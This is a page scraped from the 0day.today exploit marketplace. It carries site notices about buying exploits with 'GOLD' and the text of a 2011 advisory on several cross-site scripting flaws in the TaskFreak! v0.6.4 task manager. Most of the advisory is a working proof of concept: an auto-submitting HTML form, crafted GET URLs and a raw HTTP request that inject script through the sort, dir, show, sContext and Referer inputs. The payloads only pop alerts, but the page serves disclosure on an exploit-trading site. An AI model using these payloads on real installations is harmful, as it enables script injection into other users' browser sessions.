0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
TaskFreak! v0.6.4 Multiple Cross-Site Scripting Vulnerabilities
################################################################ TaskFreak! v0.6.4 Multiple Cross-Site Scripting Vulnerabilities Vendor: Stan Ozier Product web page: http://www.taskfreak.com Affected version: 0.6.4 (multi-user) Summary: TaskFreak! Original is a simple but efficient web based task manager written in PHP. Desc: TaskFreak! suffers from multiple XSS vulnerabilities when parsing input to multiple parameters in different scripts. The vulnerable POST parameters are: 'sContext', 'sort', 'dir' and 'show' thru index.php. Also the GET parameters 'dir' and 'show' thru 'print_list.php' are vulnerable. Header variable 'referer' is vulnerable thru rss.php script. Attackers can exploit these weaknesses to execute arbitrary HTML and script code in a user's browser session. Tested on: MS Windows XP Pro SP3-EN, XAMPP (latest) Vulnerability discovered by Gjoko 'LiquidWorm' Krstic Advisory ID: ZSL-2011-4990 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-4990 27.01.2011 ################################################################ <script type="text/javascript">function xss(){document.forms["zappa"].submit();}</script> <form name="zappa" action="http://taskfreak/index.php" method="POST" id="zappa"> <input type="hidden" name="sProject" value="0" /> <input type="hidden" name="id" value="" /> <input type="hidden" name="mode" value="save" /> <input type="hidden" name="sContext" value='%22%20onmouseover%3dprompt(/_did_you_smiled_today_?/)%20' /> <input type="hidden" name="sort" value='"><script>alert(1)</script>' /> <input type="hidden" name="dir" value='"><script>alert(2)</script>' /> <input type="hidden" name="show" value='"><script>alert(3)</script>' /> </form> <a href="javascript: xss();" style="text-decoration:none"> <b><font color="red"><center><h3>Exploit!<h3></center></font></b></a> --- http://taskfreak/print_list.php?dir=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E http://taskfreak/print_list.php?show=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E --- GET /taskfreak/rss.php HTTP/1.1 Referer: ">Waddup! User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Host: localhost Connection: Keep-alive Accept-Encoding: gzip,deflate Accept: */* # 0day.today [2024-11-16] #